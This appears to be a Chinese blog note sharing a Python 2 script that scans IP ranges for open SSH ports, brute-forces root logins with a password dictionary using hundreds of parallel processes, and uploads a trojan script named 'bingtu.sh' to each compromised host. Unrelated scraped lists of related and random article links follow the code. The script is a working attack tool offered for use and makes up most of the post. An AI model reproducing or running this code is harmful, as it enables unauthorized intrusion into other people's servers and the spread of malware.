这个扫描是概率问题,是需要字典的,以下代码是作为参考,字典可以去网上下载,我就不提供,我提供的是思路!

#!/usr/bin/env python

# coding=utf-8

 

from IPy import IP

import socket,os,re,multiprocessing,paramiko

import threading,time

import os.path

from paramiko import SSHClient

from paramiko import AutoAddPolicy

from time import ctime

 

#---------->定义变量<---------#

#-- 密码文件

password_file=os.path.join(os.getcwd(),"passwd.txt_bak")

#-- ip文件

ip_file=os.path.join(os.getcwd(),"ip.txt")

#-- 执行文件目录

Trojans_file_dir=os.getcwd()+"/include_files"

 

remote_dir="/tmp"

username="ops"

timeout_time=1

port=22

threads_num=200

 

 

#读取ip列表然后将每行ip循环出来,最终存入alllines数组

def loop_ip_everyline():

    with open(ip_file,'r') as f:

        alllines=f.readlines()

    return alllines

 

#最终输出ip格式的ip地址,最终保存在real_ips数组

def process_ip(line):

    real_ips=[]

    ip= IP(line,make_net=True)

    ips=IP(ip)

    for real_ip in ips:

        rule="(\d+\.){3}(0|255)$"

        x=re.compile(rule)

        if x.search(str(real_ip)) is  None:

            real_ips.append(real_ip)

    return real_ips

 

# 扫描指定ip的指定端口,输出所有开放了22端口的主机,终保存在last_open_ip_list数组

last_open_ip_list=[]

def scan(ip_addr):

    s = socket.socket()

    s.settimeout(timeout_time)

    if s.connect_ex((ip_addr, port)) == 0:

        return ip_addr

    s.close()

 

def put_Trojans(ip_addr,password):

    try:

        t = paramiko.Transport((ip_addr,int(port)))

        t.connect(username="root",password=password)

        sftp=paramiko.SFTPClient.from_transport(t)

        sftp.put(Trojans_file_dir+"/bingtu.sh",remote_dir+"/bingtu.sh")

        t.close()

    except Exception,e:

        print e

        print 'upload files failed:'+ip_addr

 

def try_password (ip_addr,password):

    try:

        ssh = SSHClient()

        ssh.load_system_host_keys()

        ssh.set_missing_host_key_policy(AutoAddPolicy())

        #print  "当前处理的ip是",ip_addr,"密码是"+password,ctime()

        ssh.connect(ip_addr,port,username,password,pkey=None,timeout = 2,allow_agent=False,look_for_keys=False,banner_timeout=5)

        print "目标ip"+ip_addr+"password",ctime()

        sftpclient = ssh.open_sftp()

        sftpclient.put(Trojans_file_dir+"/bingtu.sh",remote_dir+"/bingtu.sh")

        ssh.close()

        sftpclient.close()

    except Exception, e:

        print e

        #print "%s processing %s %s" % (name, ip_addr,password),ctime(),"\n"

        #print "匹配中\n"

        pass

         

 

 

if __name__ == "__main__":

    #将ip列表中的所有地址范围以ip格式存入数组last_ip_list

    print "将ip列表中的所有地址范围以ip格式存入数组last_ip_list........."

    print "破解开始"+ctime()

    alllines=loop_ip_everyline()

    ip_addr_list=[]

    for  line in alllines:

        real_ips=process_ip(line)

        for x in real_ips:

            ip_addr_list.append(str(x))

 

     

    #循环扫描各个ip的22端口,将最终开放了22端口的ip地址以数组的形式存入last_ip_list

    pool = multiprocessing.Pool(processes=threads_num)

    result=[]

    print "扫描端口开始"+ctime()

    for ip_addr in ip_addr_list:

        #print "扫描%s端口中..................." % ip_addr

        result.append(pool.apply_async(scan, args=(ip_addr,)))

    pool.close()

    pool.join()

    last_ip_list=[]

    for x in result:

        if x.get() is not None:

            last_ip_list.append(x.get())

    print "匹配的ip是",last_ip_list

    print "匹配的ip是",last_ip_list

 

    print "端口扫描完成"+ctime()

    #循环匹配开放了22端口主机的密码

    password_list = [i.strip() for i in open(password_file,'r')]

    threads = []

 

    # 创建新线程

    #n=0

    print "破解密码,传马开始"+ctime()

    #for ip_addr in last_ip_list:

    #    for password in password_list:

    #        #n=n+1

    #        thread = threading.Thread(target=try_password,args=(ip_addr,password))

    #        thread.setDaemon(True)

    #        thread.start()

    #        threads.append(thread)

    #        #print threading.activeCount()

    paramiko.util.log_to_file('paramiko.log')

    pool_1 = multiprocessing.Pool(processes=300)

    for ip_addr in last_ip_list:

        for password in password_list:

            #n=n+1

            pool_1.apply_async(try_password, args=(ip_addr,password,))

    pool_1.close()

    pool_1.join()

    ## 等待所有线程完成

    #for t in threads:

    #    t.join()

 

    print "结束"+ctime()

  

python多线程扫描爆破网站服务器思路【笔记】的更多相关文章

  1. python多线程ssh爆破

    python多线程ssh爆破 Python 0x01.About 爆弱口令时候写的一个python小脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入. 主要使用到的是pyth ...

  2. python多线程、多进程、协程笔记

    import threading import time import multiprocessing import asyncio movie_list = ['斗破.avi', '复仇者联盟.mp ...

  3. 扫描网站服务器真实IP的小脚本

    #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_8 -*- # Date: 2015年9月11日 # Author:蔚蓝行 ...

  4. Python 爬虫笔记、多线程、xml解析、基础笔记(不定时更新)

    1  Python学习网址:http://www.runoob.com/python/python-multithreading.html

  5. python多线程与多进程--存活主机ping扫描以及爬取股票价格

    python多线程与多进程 多线程: 案例:扫描给定网络中存活的主机(通过ping来测试,有响应则说明主机存活) 普通版本: #扫描给定网络中存活的主机(通过ping来测试,有响应则说明主机存活)im ...

  6. 手写网站服务器~用Python手动实现一个简单的服务器,不借助任何框架在浏览器中输出任意内容

    写在前面的一些P话: 在公司网站开发中,我们往往借助于Flask.Django等网站开发框架去提高网站开发效率.那么在面试后端开发工程师的时候,面试官可能就会问到网站开发的底层原理是什么? 我们不止仅 ...

  7. python端口扫描用多线程+线程安全的队列+Thread类实现

    用线程安全的队列Queue实现扫描端口数据存储 用多线程扫描端口 用Thread类实现程序组织 #coding:utf-8 import sys import socket import sys im ...

  8. tcp端口扫描(python多线程)

    1 使用单线程扫描单台主机 首先实现的是对单台主机中0-1024端口的扫描,发现差不多每秒扫描一个端口,很慢. import socket def tcp_scanner(host,port): cl ...

  9. 老男孩Python全栈第2期+课件笔记【高清完整92天整套视频教程】

    点击了解更多Python课程>>> 老男孩Python全栈第2期+课件笔记[高清完整92天整套视频教程] 课程目录 ├─day01-python 全栈开发-基础篇 │ 01 pyth ...

随机推荐

  1. com.alibaba.fastjson使用介绍

    首先,介绍一下fastjson.fastjson是由alibaba开源的一套json处理器.与其他json处理器(如Gson,Jackson等)和其他的Java对象序列化反序列化方式相比,有比较明显的 ...

  2. 测试从应用到DB的准确的网络延迟

    最近几大云厂商把底层的基础设施包装起来后,通过Ping等很难知道真正的网络延迟了,因为通过ping还没到db都返回了,如何知道从应用到db的真正网络延迟呢? 用我的脚本 #!/bin/bash m= ...

  3. Appium UiWatchers 监听解决各种非期待弹窗,弹层,弹弹弹等问题

    app自动化时,各种不期待的弹层弹窗,升级广告等时有飞出,由于弹窗具有不定时,不定页面等很多不确定性.有的弹窗很不友好,不×掉,很难进行下一步操作,造成 测试用例失败.而判断是否有弹窗,弹层很麻烦.研 ...

  4. Vue利用搜狐获取公网ip地址

    在index.html中添加代码: <script src="https://pv.sohu.com/cityjson?ie=utf-8"></script> ...

  5. PHP字符串替换

    $pid = str_replace(',',',',$pid); $pid = str_replace(' ','',$pid); $pid = str_replace(array(',', ' ' ...

  6. LeetCode 187. 重复的DNA序列(Repeated DNA Sequences)

    187. 重复的DNA序列 187. Repeated DNA Sequences 题目描述 All DNA is composed of a series of nucleotides abbrev ...

  7. MySql 、Oracle 获取表结构和字段信息

    1.MySql获取表结构信息 SELECT TABLE_NAME, TABLE_COMMENT FROM information_schema.`TABLES` WHERE TABLE_SCHEMA ...

  8. 转发:for /f命令之—Delims和Tokens用法&总结

    在For命令语踞饽参数F中,最难理解的就是Delims和Tokens两个选项,本文简单的做一个比较和总拮.“For /f”常用来解析文本,读取字符串.分工上,delims负责切分字符串,而tokens ...

  9. win7系统的CMD窗口切换目录--小计

    经常使用win7系统的CMD窗口,需要切换到工作目录,方法如下: 1. Win + R 2. 在命令行输入 cmd 出现如下: C:\Users\admin> 3. 在以上输入 D: (表示切换 ...

  10. IP核——RAM

    一.Quartus 1.打开Quartus ii,点击Tools---MegaWizard Plug-In Manager 2.弹出创建页面,选择Creat a new custom megafunc ...